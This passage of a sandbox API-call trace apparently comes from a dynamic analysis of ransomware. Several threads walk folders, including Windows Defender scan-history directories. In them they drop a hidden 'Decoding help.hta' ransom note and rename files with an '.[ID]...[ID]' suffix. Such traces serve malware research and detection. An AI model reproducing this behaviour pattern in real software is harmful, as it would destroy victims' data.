Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.wih.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.701] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc82d02c9, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0xc82d02c9, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x7dff79dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x36e466, dwReserved0=0x0, dwReserved1=0x0, cFileName="M1033DSK.WIH", cAlternateFileName="")) returned 0 [0059.701] FindClose (in: hFindFile=0x10fbcd18 | out: hFindFile=0x10fbcd18) returned 1 Thread: id = 917 os_tid = 0x6ec [0059.678] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*", lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0xcfc0a7e0, ftLastWriteTime.dwHighDateTime=0x1d2faf9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbccd8 [0059.678] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.678] FindNextFileW (in: hFindFile=0x10fbccd8, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0xcfc0a7e0, ftLastWriteTime.dwHighDateTime=0x1d2faf9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.678] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.678] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.678] FindNextFileW (in: hFindFile=0x10fbccd8, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfc0a7e0, ftCreationTime.dwHighDateTime=0x1d2faf9, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0xcfc30940, ftLastWriteTime.dwHighDateTime=0x1d2faf9, nFileSizeHigh=0x0, nFileSizeLow=0x33b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpSfc.bin", cAlternateFileName="")) returned 1 [0059.678] lstrcpyW (in: lpString1=0x2a840698, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*" [0059.678] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*") returned 80 [0059.678] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\Decoding help.hta" [0059.678] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\decoding help.hta")) returned 0xffffffff [0059.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x78c [0061.256] WriteFile (in: hFile=0x78c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x3f8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.257] CloseHandle (hObject=0x78c) returned 1 [0061.978] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 918 os_tid = 0x964 [0059.686] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*", lpFindFileData=0x500fd30 | out: lpFindFileData=0x500fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229c575e, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3170 [0059.686] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.686] FindNextFileW (in: hFindFile=0x5e3170, lpFindFileData=0x500fd30 | out: lpFindFileData=0x500fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229c575e, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.686] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.686] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.686] FindNextFileW (in: hFindFile=0x5e3170, lpFindFileData=0x500fd30 | out: lpFindFileData=0x500fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x510, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 1 [0059.686] lstrcpyW (in: lpString1=0x2a8486a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*" [0059.687] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*") returned 81 [0059.687] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\Decoding help.hta" [0059.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\decoding help.hta")) returned 0xffffffff [0059.687] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x78c [0061.258] WriteFile (in: hFile=0x78c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x500fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x500fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.259] CloseHandle (hObject=0x78c) returned 1 [0061.259] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.259] lstrcmpiW (lpString1="Decoding help.hta", lpString2="settings.css") returned -1 [0061.259] lstrlenW (lpString="settings.css") returned 12 [0061.259] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*" [0061.259] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*") returned 81 [0061.259] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\", lpString2="settings.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css" [0061.259] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css" [0061.259] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css.[ID]g9uZrLhJaygpwRm1[ID]" [0061.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\settings.css"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\settings.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\settings.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.978] FindNextFileW (in: hFindFile=0x5e3170, lpFindFileData=0x500fd30 | out: lpFindFileData=0x500fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x11b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="slideShow.css", cAlternateFileName="")) returned 1 Thread: id = 919 os_tid = 0x96c [0059.696] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*", lpFindFileData=0x5a4fd30 | out: lpFindFileData=0x5a4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0xa13d69d0, ftLastAccessTime.dwHighDateTime=0x1d2dda3, ftLastWriteTime.dwLowDateTime=0xa13d69d0, ftLastWriteTime.dwHighDateTime=0x1d2dda3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3570 [0059.696] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.696] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x5a4fd30 | out: lpFindFileData=0x5a4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0xa13d69d0, ftLastAccessTime.dwHighDateTime=0x1d2dda3, ftLastWriteTime.dwLowDateTime=0xa13d69d0, ftLastWriteTime.dwHighDateTime=0x1d2dda3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.696] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.696] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.696] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x5a4fd30 | out: lpFindFileData=0x5a4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x80be8ad0, ftLastWriteTime.dwHighDateTime=0x1d33740, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 1 [0059.696] lstrcmpW (lpString1=".", lpString2="Resource") returned -1 [0059.696] lstrcmpW (lpString1="..", lpString2="Resource") returned -1 [0059.696] lstrcmpiW (lpString1="windows", lpString2="Resource") returned 1 [0059.697] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*" [0059.697] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*") returned 75 [0059.697] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\", lpString2="Resource" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource" [0059.697] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*.*" [0059.697] GlobalMemoryStatus (in: lpBuffer=0x5a4fd10 | out: lpBuffer=0x5a4fd10) [0059.697] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9599b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdf4 [0059.707] CloseHandle (hObject=0xdf4) returned 1 [0059.707] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x5a4fd30 | out: lpFindFileData=0x5a4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x80be8ad0, ftLastWriteTime.dwHighDateTime=0x1d33740, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 0 [0059.707] FindClose (in: hFindFile=0x5e3570 | out: hFindFile=0x5e3570) returned 1 Thread: id = 920 os_tid = 0x960 [0059.705] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*", lpFindFileData=0x6acfd30 | out: lpFindFileData=0x6acfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0xb9820270, ftLastWriteTime.dwHighDateTime=0x1d2faf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbcd18 [0059.706] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.706] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x6acfd30 | out: lpFindFileData=0x6acfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0xb9820270, ftLastWriteTime.dwHighDateTime=0x1d2faf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.706] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.706] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.706] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x6acfd30 | out: lpFindFileData=0x6acfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb9820270, ftCreationTime.dwHighDateTime=0x1d2faf0, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0x7de6c9b0, ftLastWriteTime.dwHighDateTime=0x1d3373d, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="History.Log", cAlternateFileName="")) returned 1 [0059.706] lstrcpyW (in: lpString1=0x2a6c00b8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*" [0059.706] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*") returned 75 [0059.706] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Decoding help.hta" [0059.706] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\decoding help.hta")) returned 0xffffffff [0059.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x78c [0061.260] WriteFile (in: hFile=0x78c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x6acfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x6acfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.261] CloseHandle (hObject=0x78c) returned 1 [0061.979] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 921 os_tid = 0x694 [0059.711] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*", lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x2c87b1d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2c87b1d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671330 [0061.261] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.261] FindNextFileW (in: hFindFile=0x671330, lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x2c87b1d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2c87b1d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.261] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.261] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.261] FindNextFileW (in: hFindFile=0x671330, lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c87b1d0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x2c87b1d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2c87b1d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0061.261] lstrcpyW (in: lpString1=0x2a8486a0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*" [0061.262] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*") returned 76 [0061.262] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\Decoding help.hta" [0061.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\decoding help.hta")) returned 0x1 Thread: id = 922 os_tid = 0x4a4 [0059.715] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*.*", lpFindFileData=0xcb4fd30 | out: lpFindFileData=0xcb4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3570 [0059.716] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.716] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0xcb4fd30 | out: lpFindFileData=0xcb4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.716] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.716] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.716] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0xcb4fd30 | out: lpFindFileData=0xcb4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0059.716] FindClose (in: hFindFile=0x5e3570 | out: hFindFile=0x5e3570) returned 1 Thread: id = 923 os_tid = 0x978 [0059.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*", lpFindFileData=0xcc8fd30 | out: lpFindFileData=0xcc8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0xa13d69d0, ftLastAccessTime.dwHighDateTime=0x1d2dda3, ftLastWriteTime.dwLowDateTime=0xa13d69d0, ftLastWriteTime.dwHighDateTime=0x1d2dda3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3570 [0059.720] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.720] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0xcc8fd30 | out: lpFindFileData=0xcc8fd30*(dwFileAttributes=0x2010, 